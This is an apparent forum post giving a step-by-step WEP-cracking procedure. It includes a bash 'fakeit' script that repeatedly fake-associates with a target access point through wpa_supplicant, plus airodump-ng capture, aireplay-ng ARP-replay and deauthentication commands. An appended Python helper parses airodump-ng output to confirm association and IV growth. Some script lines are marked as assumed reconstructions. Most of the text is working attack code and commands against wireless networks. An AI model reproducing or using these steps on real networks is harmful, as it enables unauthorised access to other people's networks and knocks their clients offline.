I just wanted to post my success and what steps I followed to achieve it, because I know that many people have had problems with this (including me until about 2 hours ago).
I am using Backtrack 4 Pre Final straight "out of the box". No mods to drivers, aircrack suite, etc...
First, I created the fakeit script posted earlier in this thread. Simply copy and paste this code into your favorite text editor, and save it as fakeit.sh in the root folder.
I have already taken out the \n characters for you, so there should be no problems with that.
#!/bin/bash
# fakeit.sh - keeps re-associating wlan0 to the target AP with wpa_supplicant so aireplay-ng can replay ARP.
# Reconstructed from the fragment quoted in this post; the lines marked ASSUMED were not preserved in the post.
echo "Enter the ESSID of the Target Network: (use last)"
read SEL
if [ "$SEL" != "" ]; then
  if [ -e fake.conf ]; then
    echo "Deleting old fake.conf"
    rm -f fake.conf
  fi
  # ASSUMED: open association with no key, which is enough for the AP to accept the association
  printf 'network={\n\tssid="%s"\n\tkey_mgmt=NONE\n}\n' "$SEL" > fake.conf
  echo "Starting Fake Authentication with $SEL"
else
  if ! [ -e fake.conf ]; then
    echo "ERROR - No config found, Provide ESSID"
    exit 1
  fi
  echo "Starting Fake Authentication with Previous ESSID"
fi
echo "How many times do you want to fake it? (30):"
read TIMES
if [ "$TIMES" = "" ]; then TIMES=30; fi
echo "How many seconds between restarts? (45):"
read SEC
if [ "$SEC" = "" ]; then SEC=45; fi
i=1
while [ $i -le $TIMES ]; do
  wpa_supplicant -c fake.conf -i wlan0 -Dwext -B
  echo "Fake Auth Connection ($i of $TIMES) Success ...maybe check airodump-ng to be sure."
  i=`expr $i + 1`
  if [ $i -le $TIMES ]; then
    echo "Reconnecting in $SEC seconds"
    sleep $SEC
    killall wpa_supplicant   # ASSUMED: stop the previous instance before starting the next one
    echo "Faking orgasm again... uh! ah! That's the spot!"
  fi
done
airmon-ng start wlan0
Note the bssid, channel, and essid of the network
Stop airodump with Ctrl-C
Restart airodump on the correct channel with
airodump-ng -c 'AP Channel' -w 'filename' --bssid 'AP bssid' mon0
Leave that running and open a new terminal. Start the fakeit script with
Answer what it asks for. The main thing is to include the essid of your AP. The rest you can probably just press enter for each question and use the default values.
If all goes well, you'll get a message that says
Fake Auth Connection (1 of 30) Success ...maybe check airodump-ng to be sure.
Reconnecting in 45 seconds
Faking orgasm again... uh! ah! That's the spot!
Great, now you're associated with the AP and you should be able to replay ARP packets.
Open a third terminal and start injection with
aireplay-ng -3 -b 'bssid' mon0
Soon after, if you capture any ARP requests, you'll be able to replay these and the #Data should increase quickly.
I have not been successful without having another client connected to the network. If there is a client connected and you want to force them to send an ARP request (if you're impatient like me), you can open a fourth terminal and use
aireplay-ng -0 1 -a 'AP bssid' mon0
This will deauthenticate them and force them to reauthenticate, producing an ARP request, and the injection starts more quickly.
Hopefully this will help someone. Please don't be too harsh, this was my first post here.
On a side note, is it possible to inject WITHOUT a client already connected to the network?
And, while it seems unimportant, because I was able to crack my WEP key, I never collect any ACK packets. It remains at 0 during this entire process. I have tried generating ACK packets on the network by connecting multiple clients to the network while I'm attacking. Obviously there are ACK packets on the network since the client connects and the handshake is completed. Can anyone come up with a reason for this?
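The post leaves the "check airodump-ng to be sure" step to the eye. Here is an added example (mine, not part of the post above) that instead reads the CSV airodump-ng writes next to the capture when you pass -w filename (filename-01.csv) and checks the two things that matter for this procedure: that the MAC of the interface wpa_supplicant is using appears in the station table associated with the target BSSID rather than "(not associated)", and that the # IV column (the #Data counter on the airodump screen) is climbing between two snapshots once aireplay-ng -3 is replaying. The BSSIDs, MACs, ESSID and counters in the sample are constructed for the example; the column layout follows the airodump-ng CSV format as I know it.

```python
import csv
import io

# Constructed sample in the shape of the CSV that "airodump-ng -w filename"
# writes (filename-01.csv): an AP table, a blank line, then a station table.
# BSSIDs, MACs, ESSIDs and counters are made up for this example.
SNAPSHOT_1 = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2009-05-01 20:01:02, 2009-05-01 20:09:40, 6, 54, WEP, WEP, , -42, 412, 1873, 0. 0. 0. 0, 7, TestNet, 
66:77:88:99:AA:BB, 2009-05-01 20:01:05, 2009-05-01 20:09:40, 11, 54, WPA2, CCMP, PSK, -70, 380, 0, 0. 0. 0. 0, 5, Other, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:C0:CA:12:34:56, 2009-05-01 20:02:10, 2009-05-01 20:09:39, -35, 2201, 00:11:22:33:44:55, TestNet
00:1E:2A:AB:CD:EF, 2009-05-01 20:03:00, 2009-05-01 20:09:38, -60, 19, (not associated), TestNet
"""

# A second constructed snapshot of the same file a little later, after
# aireplay-ng -3 has started replaying ARP requests (# IV has climbed).
SNAPSHOT_2 = SNAPSHOT_1.replace("412, 1873,", "455, 9210,")

TARGET_BSSID = "00:11:22:33:44:55"   # the AP being attacked (made up)
FAKE_AUTH_MAC = "00:c0:ca:12:34:56"  # wlan0's MAC, the one wpa_supplicant associates with (made up)


def _table(part):
    """Parse one comma-separated table into a list of dicts keyed by the header cells."""
    rows = list(csv.reader(io.StringIO(part), skipinitialspace=True))
    header = [h.strip() for h in rows[0]]
    return [{h: v.strip() for h, v in zip(header, r)} for r in rows[1:] if r and r[0].strip()]


def parse_airodump_csv(text):
    """Split the dump at the blank line into (aps, stations)."""
    ap_part, _, sta_part = text.strip().partition("\n\n")
    return _table(ap_part), _table(sta_part)


def is_associated(stations, client_mac, bssid):
    """True if the station row for client_mac lists bssid (and not "(not associated)")."""
    for s in stations:
        if s["Station MAC"].lower() == client_mac.lower():
            return s["BSSID"].lower() == bssid.lower()
    return False


def iv_count(aps, bssid):
    """The # IV column (shown as #Data on the airodump screen) for bssid, or None if absent."""
    for ap in aps:
        if ap["BSSID"].lower() == bssid.lower():
            return int(ap["# IV"])
    return None


def iv_growth(before_text, after_text, bssid):
    """How many new IVs were captured for bssid between two snapshots of the CSV."""
    before = iv_count(parse_airodump_csv(before_text)[0], bssid)
    after = iv_count(parse_airodump_csv(after_text)[0], bssid)
    if before is None or after is None:
        return None
    return after - before


def fake_auth_status(text, client_mac, bssid):
    """The check the post does by eye: are we associated, and how many IVs so far?"""
    aps, stations = parse_airodump_csv(text)
    return {"associated": is_associated(stations, client_mac, bssid),
            "ivs": iv_count(aps, bssid)}


if __name__ == "__main__":
    print(fake_auth_status(SNAPSHOT_1, FAKE_AUTH_MAC, TARGET_BSSID))
    print("new IVs since last snapshot:", iv_growth(SNAPSHOT_1, SNAPSHOT_2, TARGET_BSSID))
```

To use it against a live run, point it at the filename-01.csv that your airodump-ng -w produced and pass the MAC you see for wlan0 in ifconfig wlan0 as client_mac; if the station row shows "(not associated)" the fake auth has dropped and the next wpa_supplicant restart in the fakeit loop is what brings it back. The second constructed station in the sample is there to show that case.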